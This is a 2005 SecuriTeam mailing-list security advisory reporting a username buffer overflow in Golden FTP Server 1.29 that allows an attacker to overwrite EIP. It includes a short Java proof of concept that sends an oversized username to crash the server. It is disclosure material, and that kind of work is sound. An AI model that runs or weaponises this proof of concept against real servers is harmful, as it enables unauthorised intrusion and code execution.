From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 7 Mar 2005 10:32:39 +0200
Subject: [NT] Buffer Overflow In Golden FTP ( Long Username)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050307094331.C49FD57A7@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Buffer Overflow In Golden FTP ( Long Username)
------------------------------------------------------------------------
SUMMARY
<http://www.goldenftpserver.com/>; Golden FTP Server is extremely easy to
use personal FTP server for Windows and can be run by any person who has
the most basic computer skills.
Golden FTP server contains a buffer overflow with it's username field.
DETAILS
Vulnerable Systems:
* Golden FTP Server 1.29 Freeware
Golden FTP server suffers from a Buffer Overflow when more than 284
characters is entered in the Username field at logon.
As EIP can be overwritten, it is possible to execute arbitrary code in
systems running this version of the daemon.
Proof Of Concept:
/* Carlos Ulver at gmail.com
* www.debarry2.com.br/carlos
* 03/01/05
* Golden Ftp Server 1.29(Freeware Version) Username Remote Buffer
Overflow
* This is only a proof of Concept.
* This Ftpd was running in windows xp sp1 Portuguese(Brazilian)
*
*/
import java.net.URL;
public class Pocgftpd {
public static void main(String[] args) {
String A = new String();
for(int i=0;i<281;i++) A+='a';
for (int i = 0; i < 4; i++) A+='b';
try{
//This 'a' for password means nothing...only to complete:
user:pass@host
URL u = new URL("ftp://"+A+":[email protected]");
u.openStream();
}catch(Exception E1){}
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:carlos.ulver@gmail.com.>
Carlos Ulver.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
